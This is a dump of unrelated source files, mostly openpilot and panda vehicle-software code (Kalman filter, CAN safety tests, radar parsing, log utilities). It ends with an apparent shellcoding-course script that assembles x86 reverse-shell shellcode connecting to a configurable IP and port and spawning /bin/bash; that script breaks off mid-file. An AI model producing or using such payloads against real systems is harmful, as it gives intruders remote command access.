' + repr(psi_hi) txt += '\n Psi_H(imag) Modulus = ' + repr(abs(psi_hi)) txt += '\n Psi_HBar(real) Real and Imaginary parts = '+ repr(psi_hbarr) txt += '\n Psi_HBar(real) Modulus = ' + repr(abs(psi_hbarr)) txt += '\n Psi_HBar(imag) Real and Imaginary parts = '+ repr(psi_hbari) txt += '\n Psi_HBar(imag) Modulus = ' + repr(abs(psi_hbari)) txt += '\n ' txt += '\n Psi/F factor = ' + repr(psi_over_f) txt += '\n ' txt += '\n Average Temperature factor = ' + repr(TEMPER_AVE) txt += '\n Refraction index = 1 - delta - i*beta' txt += '\n delta = ' + repr(DELTA_REF) txt += '\n beta = ' + repr(1.0e0*REFRAC.imag) txt += '\n Absorption coeff = ' + repr(ABSORP)+' cm^-1' txt += '\n ' txt += '\n e^2/(mc^2)/V = ' + repr(rn)+' cm^-2' txt += '\n d-spacing = ' + repr(dspacing*1.0e8)+' Angstroms' txt += '\n SIN(theta)/Lambda = ' + repr(ratio) txt += '\n ' txt += '\n Darwin width for symmetric s-pol [microrad] = ' + repr(2.0e6*ssr) txt += '\n Darwin width for symmetric p-pol [microrad] = ' + repr(2.0e6*spr) return {"PHOT":phot, "WAVELENGTH":r_lam0*1e-2 ,"THETA":itheta,"THETAcor":THETA_B, "F_0":F_0, "FH":FH, "FH_BAR":FH_BAR, "STRUCT":STRUCT, "psi_0":psi_0, "psi_h":psi_h, "psi_hbar":psi_hbar, "DELTA_REF":DELTA_REF, "REFRAC":REFRAC, "ABSORP":ABSORP, "RATIO":ratio, "ssr":ssr, "spr":spr, "psi_over_f":psi_over_f, "info":txt} ```
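The f'/f'' lookup inside `crystal_fh2` is plain linear interpolation over the energy grid precomputed by `bragg_calc`. A minimal sketch of that step, with made-up grid values standing in for the `energy`, `f1` and `f2` arrays; `numpy.searchsorted` replaces the explicit scan-and-break loop:

```python
import numpy as np

# Hypothetical energy grid and anomalous terms for a single atom type.
energy = np.array([5000.0, 6000.0, 7000.0])  # eV
fp = np.array([[0.10, 0.25, 0.40]])          # f' per atom, per grid point
fpp = np.array([[0.50, 0.40, 0.30]])         # f'' per atom, per grid point

def interpolate_f1_f2(phot, energy, fp, fpp, j=0):
    """Linearly interpolate f' and f'' at photon energy phot (eV)."""
    # side="right" reproduces the scan loop (grid point at or below phot);
    # the clamp keeps the upper grid edge in range, as the loop does.
    nener = min(np.searchsorted(energy, phot, side="right") - 1, len(energy) - 2)
    frac = (phot - energy[nener]) / (energy[nener + 1] - energy[nener])
    f1 = fp[j, nener] + (fp[j, nener + 1] - fp[j, nener]) * frac
    f2 = fpp[j, nener] + (fpp[j, nener + 1] - fpp[j, nener]) * frac
    return f1, f2

print(interpolate_f1_f2(6500.0, energy, fp, fpp))  # ~(0.325, 0.35)
```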
{ "source": "919bot/Tessa", "score": 3 }
#### File: common/kalman/simple_kalman_old.py ```python import numpy as np class KF1D: # this EKF assumes constant covariance matrix, so calculations are much simpler # the Kalman gain also needs to be precomputed using the control module def __init__(self, x0, A, C, K): self.x = x0 self.A = A self.C = C self.K = K self.A_K = self.A - np.dot(self.K, self.C) # K matrix needs to be pre-computed as follow: # import control # (x, l, K) = control.dare(np.transpose(self.A), np.transpose(self.C), Q, R) # self.K = np.transpose(K) def update(self, meas): self.x = np.dot(self.A_K, self.x) + np.dot(self.K, meas) return self.x ``` #### File: can/tests/test_define.py ```python import unittest from opendbc.can.can_define import CANDefine class TestCADNDefine(unittest.TestCase): def test_civic(self): dbc_file = "honda_civic_touring_2016_can_generated" defs = CANDefine(dbc_file) self.assertDictEqual(defs.dv[399], defs.dv['STEER_STATUS']) self.assertDictEqual(defs.dv[399], {'STEER_STATUS': {6: 'TMP_FAULT', 5: 'FAULT_1', 4: 'NO_TORQUE_ALERT_2', 3: 'LOW_SPEED_LOCKOUT', 2: 'NO_TORQUE_ALERT_1', 0: 'NORMAL'} } ) if __name__ == "__main__": unittest.main() ``` #### File: tests/automated/0_builds.py ```python from panda import build_st def test_build_panda(): build_st("obj/panda.bin") def test_build_bootstub_panda(): build_st("obj/bootstub.panda.bin") ``` #### File: tests/automated/1_program.py ```python import os from nose.tools import assert_equal from panda import Panda, BASEDIR from .helpers import reset_pandas, test_all_pandas, panda_connect_and_init # Reset the pandas before flashing them def aaaa_reset_before_tests(): reset_pandas() @test_all_pandas @panda_connect_and_init def test_recover(p): assert p.recover(timeout=30) @test_all_pandas @panda_connect_and_init def test_flash(p): p.flash() @test_all_pandas @panda_connect_and_init def test_get_signature(p): fn = os.path.join(BASEDIR, "board/obj/panda.bin") firmware_sig = Panda.get_signature_from_firmware(fn) panda_sig = p.get_signature() assert_equal(panda_sig, firmware_sig) ``` #### File: tests/automated/wifi_helpers.py ```python import os import sys import time import subprocess import requests from panda import Panda FNULL = open(os.devnull, 'w') def _connect_wifi(dongle_id, pw, insecure_okay=False): ssid = "panda-" + dongle_id r = subprocess.call(["ping", "-W", "4", "-c", "1", "192.168.0.10"], stdout=FNULL, stderr=subprocess.STDOUT) if not r: # Can already ping, try connecting on wifi try: p = Panda("WIFI") p.get_serial() print("Already connected") return except: pass print("WIFI: connecting to %s" % ssid) while 1: if sys.platform == "darwin": os.system("networksetup -setairportnetwork en0 %s %s" % (ssid, pw)) else: wlan_interface = subprocess.check_output(["sh", "-c", "iw dev | awk '/Interface/ {print $2}'"]).strip().decode('utf8') cnt = 0 MAX_TRIES = 10 while cnt < MAX_TRIES: print("WIFI: scanning %d" % cnt) os.system("iwlist %s scanning > /dev/null" % wlan_interface) os.system("nmcli device wifi rescan") wifi_networks = [x.decode("utf8") for x in subprocess.check_output(["nmcli","dev", "wifi", "list"]).split(b"\n")] wifi_scan = [x for x in wifi_networks if ssid in x] if len(wifi_scan) != 0: break time.sleep(0.1) # MAX_TRIES tries, ~10 seconds max cnt += 1 assert cnt < MAX_TRIES if "-pair" in wifi_scan[0]: os.system("nmcli d wifi connect %s-pair" % (ssid)) connect_cnt = 0 MAX_TRIES = 100 while connect_cnt < MAX_TRIES: connect_cnt += 1 r = subprocess.call(["ping", "-W", "4", "-c", "1", "192.168.0.10"], stdout=FNULL, stderr=subprocess.STDOUT) if r: 
print("Waiting for panda to ping...") time.sleep(0.5) else: break if insecure_okay: break # fetch webpage print("connecting to insecure network to secure") try: r = requests.get("http://192.168.0.10/") except requests.ConnectionError: r = requests.get("http://192.168.0.10/") assert r.status_code==200 print("securing") try: r = requests.get("http://192.168.0.10/secure", timeout=0.01) except requests.exceptions.Timeout: print("timeout http request to secure") pass else: ret = os.system("nmcli d wifi connect %s password %s" % (ssid, pw)) if os.WEXITSTATUS(ret) == 0: #check ping too ping_ok = False connect_cnt = 0 MAX_TRIES = 10 while connect_cnt < MAX_TRIES: connect_cnt += 1 r = subprocess.call(["ping", "-W", "4", "-c", "1", "192.168.0.10"], stdout=FNULL, stderr=subprocess.STDOUT) if r: print("Waiting for panda to ping...") time.sleep(0.1) else: ping_ok = True break if ping_ok: break # TODO: confirm that it's connected to the right panda ``` #### File: panda/tests/elm_throughput.py ```python import socket import threading import select class Reader(threading.Thread): def __init__(self, s, *args, **kwargs): super(Reader, self).__init__(*args, **kwargs) self._s = s self.__stop = False def stop(self): self.__stop = True def run(self): while not self.__stop: s.recv(1000) def read_or_fail(s): ready = select.select([s], [], [], 4) assert ready[0], "Socket did not receive data within the timeout duration." return s.recv(1000) def send_msg(s, msg): s.send(msg) res = b'' while not res.endswith(">"): res += read_or_fail(s) return res if __name__ == "__main__": s = socket.create_connection(("192.168.0.10", 35000)) #t1 = Reader(s) #t1.start() send_msg(s, b"ATZ\r") send_msg(s, b"ATL1\r") print(send_msg(s, b"ATE0\r")) print(send_msg(s, b"ATS0\r")) print(send_msg(s, b"ATSP6\r")) print("\nLOOP\n") while True: print(send_msg(s, b"0100\r")) print(send_msg(s, b"010d\r")) ``` #### File: tests/safety/test_subaru.py ```python import unittest import numpy as np from panda import Panda from panda.tests.safety import libpandasafety_py from panda.tests.safety.common import test_relay_malfunction, make_msg, test_manually_enable_controls_allowed, test_spam_can_buses MAX_RATE_UP = 50 MAX_RATE_DOWN = 70 MAX_STEER = 2047 MAX_RT_DELTA = 940 RT_INTERVAL = 250000 DRIVER_TORQUE_ALLOWANCE = 60; DRIVER_TORQUE_FACTOR = 10; TX_MSGS = [[0x122, 0], [0x164, 0], [0x221, 0], [0x322, 0]] def twos_comp(val, bits): if val >= 0: return val else: return (2**bits) + val def sign(a): if a > 0: return 1 else: return -1 class TestSubaruSafety(unittest.TestCase): @classmethod def setUp(cls): cls.safety = libpandasafety_py.libpandasafety cls.safety.set_safety_hooks(Panda.SAFETY_SUBARU, 0) cls.safety.init_tests_subaru() def _set_prev_torque(self, t): self.safety.set_subaru_desired_torque_last(t) self.safety.set_subaru_rt_torque_last(t) def _torque_driver_msg(self, torque): t = twos_comp(torque, 11) to_send = make_msg(0, 0x119) to_send[0].RDLR = ((t & 0x7FF) << 16) return to_send def _torque_msg(self, torque): to_send = make_msg(0, 0x122) t = twos_comp(torque, 13) to_send[0].RDLR = (t << 16) return to_send def test_spam_can_buses(self): test_spam_can_buses(self, TX_MSGS) def test_relay_malfunction(self): test_relay_malfunction(self, 0x122) def test_default_controls_not_allowed(self): self.assertFalse(self.safety.get_controls_allowed()) def test_enable_control_allowed_from_cruise(self): to_push = make_msg(0, 0x240) to_push[0].RDHR = 1 << 9 self.safety.safety_rx_hook(to_push) self.assertTrue(self.safety.get_controls_allowed()) def 
test_disable_control_allowed_from_cruise(self): to_push = make_msg(0, 0x240) to_push[0].RDHR = 0 self.safety.set_controls_allowed(1) self.safety.safety_rx_hook(to_push) self.assertFalse(self.safety.get_controls_allowed()) def test_steer_safety_check(self): for enabled in [0, 1]: for t in range(-3000, 3000): self.safety.set_controls_allowed(enabled) self._set_prev_torque(t) if abs(t) > MAX_STEER or (not enabled and abs(t) > 0): self.assertFalse(self.safety.safety_tx_hook(self._torque_msg(t))) else: self.assertTrue(self.safety.safety_tx_hook(self._torque_msg(t))) def test_manually_enable_controls_allowed(self): test_manually_enable_controls_allowed(self) def test_non_realtime_limit_up(self): self.safety.set_subaru_torque_driver(0, 0) self.safety.set_controls_allowed(True) self._set_prev_torque(0) self.assertTrue(self.safety.safety_tx_hook(self._torque_msg(MAX_RATE_UP))) self._set_prev_torque(0) self.assertTrue(self.safety.safety_tx_hook(self._torque_msg(-MAX_RATE_UP))) self._set_prev_torque(0) self.assertFalse(self.safety.safety_tx_hook(self._torque_msg(MAX_RATE_UP + 1))) self.safety.set_controls_allowed(True) self._set_prev_torque(0) self.assertFalse(self.safety.safety_tx_hook(self._torque_msg(-MAX_RATE_UP - 1))) def test_non_realtime_limit_down(self): self.safety.set_subaru_torque_driver(0, 0) self.safety.set_controls_allowed(True) def test_against_torque_driver(self): self.safety.set_controls_allowed(True) for sign in [-1, 1]: for t in np.arange(0, DRIVER_TORQUE_ALLOWANCE + 1, 1): t *= -sign self.safety.set_subaru_torque_driver(t, t) self._set_prev_torque(MAX_STEER * sign) self.assertTrue(self.safety.safety_tx_hook(self._torque_msg(MAX_STEER * sign))) self.safety.set_subaru_torque_driver(DRIVER_TORQUE_ALLOWANCE + 1, DRIVER_TORQUE_ALLOWANCE + 1) self.assertFalse(self.safety.safety_tx_hook(self._torque_msg(-MAX_STEER))) # spot check some individual cases for sign in [-1, 1]: driver_torque = (DRIVER_TORQUE_ALLOWANCE + 10) * sign torque_desired = (MAX_STEER - 10 * DRIVER_TORQUE_FACTOR) * sign delta = 1 * sign self._set_prev_torque(torque_desired) self.safety.set_subaru_torque_driver(-driver_torque, -driver_torque) self.assertTrue(self.safety.safety_tx_hook(self._torque_msg(torque_desired))) self._set_prev_torque(torque_desired + delta) self.safety.set_subaru_torque_driver(-driver_torque, -driver_torque) self.assertFalse(self.safety.safety_tx_hook(self._torque_msg(torque_desired + delta))) self._set_prev_torque(MAX_STEER * sign) self.safety.set_subaru_torque_driver(-MAX_STEER * sign, -MAX_STEER * sign) self.assertTrue(self.safety.safety_tx_hook(self._torque_msg((MAX_STEER - MAX_RATE_DOWN) * sign))) self._set_prev_torque(MAX_STEER * sign) self.safety.set_subaru_torque_driver(-MAX_STEER * sign, -MAX_STEER * sign) self.assertTrue(self.safety.safety_tx_hook(self._torque_msg(0))) self._set_prev_torque(MAX_STEER * sign) self.safety.set_subaru_torque_driver(-MAX_STEER * sign, -MAX_STEER * sign) self.assertFalse(self.safety.safety_tx_hook(self._torque_msg((MAX_STEER - MAX_RATE_DOWN + 1) * sign))) def test_realtime_limits(self): self.safety.set_controls_allowed(True) for sign in [-1, 1]: self.safety.init_tests_subaru() self._set_prev_torque(0) self.safety.set_subaru_torque_driver(0, 0) for t in np.arange(0, MAX_RT_DELTA, 1): t *= sign self.assertTrue(self.safety.safety_tx_hook(self._torque_msg(t))) self.assertFalse(self.safety.safety_tx_hook(self._torque_msg(sign * (MAX_RT_DELTA + 1)))) self._set_prev_torque(0) for t in np.arange(0, MAX_RT_DELTA, 1): t *= sign 
self.assertTrue(self.safety.safety_tx_hook(self._torque_msg(t))) # Increase timer to update rt_torque_last self.safety.set_timer(RT_INTERVAL + 1) self.assertTrue(self.safety.safety_tx_hook(self._torque_msg(sign * (MAX_RT_DELTA - 1)))) self.assertTrue(self.safety.safety_tx_hook(self._torque_msg(sign * (MAX_RT_DELTA + 1)))) def test_fwd_hook(self): buss = list(range(0x0, 0x3)) msgs = list(range(0x1, 0x800)) blocked_msgs = [290, 356, 545, 802] for b in buss: for m in msgs: if b == 0: fwd_bus = 2 elif b == 1: fwd_bus = -1 elif b == 2: fwd_bus = -1 if m in blocked_msgs else 0 # assume len 8 self.assertEqual(fwd_bus, self.safety.safety_fwd_hook(b, make_msg(b, m, 8))) if __name__ == "__main__": unittest.main() ``` #### File: pyextra/logentries/metrics.py ```python from logentries import LogentriesHandler from threading import Lock from functools import wraps import logging import time import sys import psutil glob_time = 0 glob_name = 0 log = logging.getLogger('logentries') log.setLevel(logging.INFO) class Metric(object): def __init__(self, token): self._count = 0.0 self._sum = 0.0 self._lock = Lock() self.token = token handler = LogentriesHandler(token) log.addHandler(handler) def observe(self, amount): with self._lock: self._count += 1 self._sum += amount def metric(self): '''Mesaure function execution time in seconds and forward it to Logentries''' class Timer(object): def __init__(self, summary): self._summary = summary def __enter__(self): self._start = time.time() def __exit__(self, typ, value, traceback): global glob_time self._summary.observe(max(time.time() - self._start, 0)) glob_time = time.time()- self._start log.info("function_name=" + glob_name + " " + "execution_time=" + str(glob_time) + " " + "cpu=" + str(psutil.cpu_percent(interval=None)) + " " + "cpu_count=" + str(psutil.cpu_count())+ " " + "memory=" + str(psutil.virtual_memory()) ) def __call__(self, f): @wraps(f) def wrapped(*args, **kwargs): with self: global glob_name glob_name = f.__name__ return f(*args, **kwargs) return wrapped return Timer(self) ``` #### File: boardd/tests/test_boardd_api.py ```python import random import numpy as np import selfdrive.boardd.tests.boardd_old as boardd_old import selfdrive.boardd.boardd as boardd from common.realtime import sec_since_boot from cereal import log import unittest def generate_random_can_data_list(): can_list = [] cnt = random.randint(1, 64) for j in range(cnt): can_data = np.random.bytes(random.randint(1, 8)) can_list.append([random.randint(0, 128), random.randint(0, 128), can_data, random.randint(0, 128)]) return can_list, cnt class TestBoarddApiMethods(unittest.TestCase): def test_correctness(self): for i in range(1000): can_list, _ = generate_random_can_data_list() # Sendcan # Old API m_old = boardd_old.can_list_to_can_capnp(can_list, 'sendcan').to_bytes() # new API m = boardd.can_list_to_can_capnp(can_list, 'sendcan') ev_old = log.Event.from_bytes(m_old) ev = log.Event.from_bytes(m) self.assertEqual(ev_old.which(), ev.which()) self.assertEqual(len(ev.sendcan), len(ev_old.sendcan)) for i in range(len(ev.sendcan)): attrs = ['address', 'busTime', 'dat', 'src'] for attr in attrs: self.assertEqual(getattr(ev.sendcan[i], attr, 'new'), getattr(ev_old.sendcan[i], attr, 'old')) # Can m_old = boardd_old.can_list_to_can_capnp(can_list, 'can').to_bytes() # new API m = boardd.can_list_to_can_capnp(can_list, 'can') ev_old = log.Event.from_bytes(m_old) ev = log.Event.from_bytes(m) self.assertEqual(ev_old.which(), ev.which()) self.assertEqual(len(ev.can), len(ev_old.can)) for i in 
range(len(ev.can)): attrs = ['address', 'busTime', 'dat', 'src'] for attr in attrs: self.assertEqual(getattr(ev.can[i], attr, 'new'), getattr(ev_old.can[i], attr, 'old')) def test_performance(self): can_list, cnt = generate_random_can_data_list() recursions = 1000 n1 = sec_since_boot() for i in range(recursions): boardd_old.can_list_to_can_capnp(can_list, 'sendcan').to_bytes() n2 = sec_since_boot() elapsed_old = n2 - n1 # print('Old API, elapsed time: {} secs'.format(elapsed_old)) n1 = sec_since_boot() for i in range(recursions): boardd.can_list_to_can_capnp(can_list) n2 = sec_since_boot() elapsed_new = n2 - n1 # print('New API, elapsed time: {} secs'.format(elapsed_new)) self.assertTrue(elapsed_new < elapsed_old / 2) if __name__ == '__main__': unittest.main() ``` #### File: camerad/snapshot/visionipc.py ```python import os from cffi import FFI import numpy as np gf_dir = os.path.dirname(os.path.abspath(__file__)) ffi = FFI() ffi.cdef(""" typedef enum VisionStreamType { VISION_STREAM_RGB_BACK, VISION_STREAM_RGB_FRONT, VISION_STREAM_YUV, VISION_STREAM_YUV_FRONT, VISION_STREAM_MAX, } VisionStreamType; typedef struct VisionUIInfo { int big_box_x, big_box_y; int big_box_width, big_box_height; int transformed_width, transformed_height; int front_box_x, front_box_y; int front_box_width, front_box_height; } VisionUIInfo; typedef struct VisionStreamBufs { VisionStreamType type; int width, height, stride; size_t buf_len; union { VisionUIInfo ui_info; } buf_info; } VisionStreamBufs; typedef struct VIPCBuf { int fd; size_t len; void* addr; } VIPCBuf; typedef struct VIPCBufExtra { // only for yuv uint32_t frame_id; uint64_t timestamp_eof; } VIPCBufExtra; typedef struct VisionStream { int ipc_fd; int last_idx; int last_type; int num_bufs; VisionStreamBufs bufs_info; VIPCBuf *bufs; } VisionStream; int visionstream_init(VisionStream *s, VisionStreamType type, bool tbuffer, VisionStreamBufs *out_bufs_info); VIPCBuf* visionstream_get(VisionStream *s, VIPCBufExtra *out_extra); void visionstream_destroy(VisionStream *s); """ ) class VisionIPCError(Exception): pass class VisionIPC(): def __init__(self, front=False): self.clib = ffi.dlopen(os.path.join(gf_dir, "libvisionipc.so")) self.s = ffi.new("VisionStream*") self.buf_info = ffi.new("VisionStreamBufs*") err = self.clib.visionstream_init(self.s, self.clib.VISION_STREAM_RGB_FRONT if front else self.clib.VISION_STREAM_RGB_BACK, True, self.buf_info) if err != 0: self.clib.visionstream_destroy(self.s) raise VisionIPCError def __del__(self): self.clib.visionstream_destroy(self.s) def get(self): buf = self.clib.visionstream_get(self.s, ffi.NULL) pbuf = ffi.buffer(buf.addr, buf.len) ret = np.frombuffer(pbuf, dtype=np.uint8).reshape((-1, self.buf_info.stride//3, 3)) return ret[:self.buf_info.height, :self.buf_info.width, [2,1,0]] ``` #### File: car/chrysler/radar_interface.py ```python import os from opendbc.can.parser import CANParser from cereal import car from selfdrive.car.interfaces import RadarInterfaceBase RADAR_MSGS_C = list(range(0x2c2, 0x2d4+2, 2)) # c_ messages 706,...,724 RADAR_MSGS_D = list(range(0x2a2, 0x2b4+2, 2)) # d_ messages LAST_MSG = max(RADAR_MSGS_C + RADAR_MSGS_D) NUMBER_MSGS = len(RADAR_MSGS_C) + len(RADAR_MSGS_D) def _create_radar_can_parser(): dbc_f = 'chrysler_pacifica_2017_hybrid_private_fusion.dbc' msg_n = len(RADAR_MSGS_C) # list of [(signal name, message name or number, initial values), (...)] # [('RADAR_STATE', 1024, 0), # ('LONG_DIST', 1072, 255), # ('LONG_DIST', 1073, 255), # ('LONG_DIST', 1074, 255), # ('LONG_DIST', 1075, 255), # 
The factor and offset are applied by the dbc parsing library, so the # default values should be after the factor/offset are applied. signals = list(zip(['LONG_DIST'] * msg_n + ['LAT_DIST'] * msg_n + ['REL_SPEED'] * msg_n, RADAR_MSGS_C * 2 + # LONG_DIST, LAT_DIST RADAR_MSGS_D, # REL_SPEED [0] * msg_n + # LONG_DIST [-1000] * msg_n + # LAT_DIST [-146.278] * msg_n)) # REL_SPEED set to 0, factor/offset to this # TODO what are the checks actually used for? # honda only checks the last message, # toyota checks all the messages. Which do we want? checks = list(zip(RADAR_MSGS_C + RADAR_MSGS_D, [20]*msg_n + # 20Hz (0.05s) [20]*msg_n)) # 20Hz (0.05s) return CANParser(os.path.splitext(dbc_f)[0], signals, checks, 1) def _address_to_track(address): if address in RADAR_MSGS_C: return (address - RADAR_MSGS_C[0]) // 2 if address in RADAR_MSGS_D: return (address - RADAR_MSGS_D[0]) // 2 raise ValueError("radar received unexpected address %d" % address) class RadarInterface(RadarInterfaceBase): def __init__(self, CP): self.pts = {} self.delay = 0 # Delay of radar #TUNE self.rcp = _create_radar_can_parser() self.updated_messages = set() self.trigger_msg = LAST_MSG def update(self, can_strings): vls = self.rcp.update_strings(can_strings) self.updated_messages.update(vls) if self.trigger_msg not in self.updated_messages: return None ret = car.RadarData.new_message() errors = [] if not self.rcp.can_valid: errors.append("canError") ret.errors = errors for ii in self.updated_messages: # ii should be the message ID as a number cpt = self.rcp.vl[ii] trackId = _address_to_track(ii) if trackId not in self.pts: self.pts[trackId] = car.RadarData.RadarPoint.new_message() self.pts[trackId].trackId = trackId self.pts[trackId].aRel = float('nan') self.pts[trackId].yvRel = float('nan') self.pts[trackId].measured = True if 'LONG_DIST' in cpt: # c_* message self.pts[trackId].dRel = cpt['LONG_DIST'] # from front of car # our lat_dist is positive to the right in car's frame. # TODO what does yRel want? self.pts[trackId].yRel = cpt['LAT_DIST'] # in car frame's y axis, left is positive else: # d_* message self.pts[trackId].vRel = cpt['REL_SPEED'] # We want a list, not a dictionary. Filter out LONG_DIST==0 because that means it's not valid. 
ret.points = [x for x in self.pts.values() if x.dRel != 0] self.updated_messages.clear() return ret ``` #### File: selfdrive/debug/can_compare.py ```python import binascii import os import sys from collections import defaultdict import cereal.messaging as messaging from common.realtime import sec_since_boot def can_compare(bus=0, max_msg=None, addr="127.0.0.1"): logcan = messaging.sub_sock('can', addr=addr) start = sec_since_boot() msgs = defaultdict(list) canbus = int(os.getenv("CAN", bus)) while sec_since_boot()-start < 5.0: can_recv = messaging.drain_sock(logcan, wait_for_one=True) for x in can_recv: for y in x.can: if y.src == canbus: msgs[y.address].append(y.dat) try: input("Change State and press Enter to continue...") except SyntaxError: pass start = sec_since_boot() msgs2 = defaultdict(list) while sec_since_boot()-start < 5.0: can_recv = messaging.drain_sock(logcan, wait_for_one=True) for x in can_recv: for y in x.can: if y.src == canbus: msgs2[y.address].append(y.dat) try: input("Change State back and press Enter to continue...") except SyntaxError: pass start = sec_since_boot() msgs3 = defaultdict(list) while sec_since_boot()-start < 5.0: can_recv = messaging.drain_sock(logcan, wait_for_one=True) for x in can_recv: for y in x.can: if y.src == canbus: msgs3[y.address].append(y.dat) dd = chr(27) + "[2J" dd += "%5.2f\n" % (sec_since_boot() - start) for k,v in sorted(zip(msgs.keys(), map(lambda x: binascii.hexlify(x[-1]), msgs.values()))): try: if binascii.hexlify(list(msgs2.values())[list(msgs2).index(k)][-1]) != binascii.hexlify(list(msgs3.values())[list(msgs3).index(k)][-1]) and v == binascii.hexlify(list(msgs3.values())[list(msgs3).index(k)][-1]): dd += "%s(%6d) %s\n" % ("%04X(%4d)" % (k,k),len(msgs[k]), v.decode('ascii')) w = binascii.hexlify(list(msgs2.values())[list(msgs2).index(k)][-1]) dd +="%s(%6d) %s\n" % ("%04X(%4d)" % (k,k),len(msgs[k]), w.decode('ascii')) except ValueError: pass print(dd) if __name__ == "__main__": if len(sys.argv) > 3: can_compare(int(sys.argv[1]), int(sys.argv[2]), sys.argv[3]) elif len(sys.argv) > 2: can_compare(int(sys.argv[1]), int(sys.argv[2])) elif len(sys.argv) > 1: can_compare(int(sys.argv[1])) else: can_compare() ``` #### File: tools/lib/cache.py ```python import os from tools.lib.file_helpers import mkdirs_exists_ok DEFAULT_CACHE_DIR = os.path.expanduser("~/.commacache") def cache_path_for_file_path(fn, cache_prefix=None): dir_ = os.path.join(DEFAULT_CACHE_DIR, "local") mkdirs_exists_ok(dir_) return os.path.join(dir_, os.path.abspath(fn).replace("/", "_")) ``` #### File: tools/lib/log_util.py ```python from cereal import log as capnp_log def write_can_to_msg(data, src, msg): if not isinstance(data[0], Sequence): data = [data] can_msgs = msg.init('can', len(data)) for i, d in enumerate(data): if d[0] < 0: continue # ios bug cc = can_msgs[i] cc.address = d[0] cc.busTime = 0 cc.dat = hex_to_str(d[2]) if len(d) == 4: cc.src = d[3] cc.busTime = d[1] else: cc.src = src def convert_old_pkt_to_new(old_pkt): m, d = old_pkt msg = capnp_log.Event.new_message() if len(m) == 3: _, pid, t = m msg.logMonoTime = t else: t, pid = m msg.logMonoTime = int(t * 1e9) last_velodyne_time = None if pid == PID_OBD: write_can_to_msg(d, 0, msg) elif pid == PID_CAM: frame = msg.init('frame') frame.frameId = d[0] frame.timestampEof = msg.logMonoTime # iOS elif pid == PID_IGPS: loc = msg.init('gpsLocation') loc.latitude = d[0] loc.longitude = d[1] loc.speed = d[2] loc.timestamp = int(m[0]*1000.0) # on iOS, first number is wall time in seconds loc.flags = 1 | 4 # has 
latitude, longitude, and speed. elif pid == PID_IMOTION: user_acceleration = d[:3] gravity = d[3:6] # iOS separates gravity from linear acceleration, so we recombine them. # Apple appears to use this constant for the conversion. g = -9.8 acceleration = [g*(a + b) for a, b in zip(user_acceleration, gravity)] accel_event = msg.init('sensorEvents', 1)[0] accel_event.acceleration.v = acceleration # android elif pid == PID_GPS: if len(d) <= 6 or d[-1] == "gps": loc = msg.init('gpsLocation') loc.latitude = d[0] loc.longitude = d[1] loc.speed = d[2] if len(d) > 6: loc.timestamp = d[6] loc.flags = 1 | 4 # has latitude, longitude, and speed. elif pid == PID_ACCEL: val = d[2] if type(d[2]) != type(0.0) else d accel_event = msg.init('sensorEvents', 1)[0] accel_event.acceleration.v = val elif pid == PID_GYRO: val = d[2] if type(d[2]) != type(0.0) else d gyro_event = msg.init('sensorEvents', 1)[0] gyro_event.init('gyro').v = val elif pid == PID_LIDAR: lid = msg.init('lidarPts') lid.idx = d[3] elif pid == PID_APPLANIX: loc = msg.init('liveLocation') loc.status = d[18] loc.lat, loc.lon, loc.alt = d[0:3] loc.vNED = d[3:6] loc.roll = d[6] loc.pitch = d[7] loc.heading = d[8] loc.wanderAngle = d[9] loc.trackAngle = d[10] loc.speed = d[11] loc.gyro = d[12:15] loc.accel = d[15:18] elif pid == PID_IBAROMETER: pressure_event = msg.init('sensorEvents', 1)[0] _, pressure = d[0:2] pressure_event.init('pressure').v = [pressure] # Kilopascals elif pid == PID_IINIT and len(d) == 4: init_event = msg.init('initData') init_event.deviceType = capnp_log.InitData.DeviceType.chffrIos build_info = init_event.init('iosBuildInfo') build_info.appVersion = d[0] build_info.appBuild = int(d[1]) build_info.osVersion = d[2] build_info.deviceModel = d[3] return msg.as_reader() ```
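`convert_old_pkt_to_new` above dispatches on a packet id; note the excerpt leans on `Sequence`, `hex_to_str` and the `PID_*` constants defined elsewhere in the original module. A self-contained sketch of the same old-packet to capnp-event pattern, reduced to two hypothetical sensor pids:

```python
from cereal import log as capnp_log

# Hypothetical pid constants; the real module defines many more.
PID_ACCEL = 1
PID_GYRO = 2

def convert_sensor_pkt(old_pkt):
    """Convert an old ((t, pid), data) packet into a capnp Event reader."""
    (t, pid), d = old_pkt
    msg = capnp_log.Event.new_message()
    msg.logMonoTime = int(t * 1e9)
    event = msg.init('sensorEvents', 1)[0]
    if pid == PID_ACCEL:
        event.acceleration.v = d
    elif pid == PID_GYRO:
        event.init('gyro').v = d
    return msg.as_reader()

reader = convert_sensor_pkt(((12.5, PID_ACCEL), [0.0, 0.0, -9.8]))
```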
{ "source": "91fc7b/SLAE", "score": 3 }
#### File: SLAE/2/create_shellcode.py ```python import sys def ip2int(ip): o = map(int, ip.split('.')) res = (16777216 * o[0]) + (65536 * o[1]) + (256 * o[2]) + o[3] return res def int2ip(ipnum): o1 = int(ipnum / 16777216) % 256 o2 = int(ipnum / 65536) % 256 o3 = int(ipnum / 256) % 256 o4 = int(ipnum) % 256 return '%(o1)s.%(o2)s.%(o3)s.%(o4)s' % locals() shellcode_start = "\\x31\\xc9\\x89\\xc8\\xb0\\x66\\x89\\xcb\\xb3\\x01\\x51\\x6a\\x01\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x89\\xc2\\x31\\xc9\\x89\\xc8\\xb0\\x66\\x89\\xcb\\xb3\\x03\\x68" shellcode_ip = "\\x7f\\x01\\x01\\x01" #ip 127.1.1.1 shellcode_middle = "\\x66\\x68" shellcode_port = "\\x04\\xd2" #1234 shellcode_end = "\\x66\\x6a\\x02\\x89\\xe1\\x6a\\x10\\x51\\x52\\x89\\xe1\\xcd\\x80\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\x31\\xc9\\xcd\\x80\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\x31\\xc9\\xb1\\x01\\xcd\\x80\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\x31\\xc9\\xb1\\x02\\xcd\\x80\\x31\\xc0\\xb0\\x0b\\x31\\xc9\\x51\\x68\\x62\\x61\\x73\\x68\\x68\\x62\\x69\\x6e\\x2f\\x68\\x2f\\x2f\\x2f\\x2f\\x89\\xe3\\x31\\xc9\\x31\\xd2\\xcd\\x80" if len(sys.argv) == 3: port_number = int(sys.argv[2]) #port_number = 1234 port_str = "{0:0{1}x}".format(port_number,4) shellcode_port = "\\x" + port_str[0] + port_str[1] + "\\x" + port_str[2] + port_str[3] ip_number = ip2int(sys.argv[1]) ip_str = "{0:0{1}x}".format(ip_number,8) 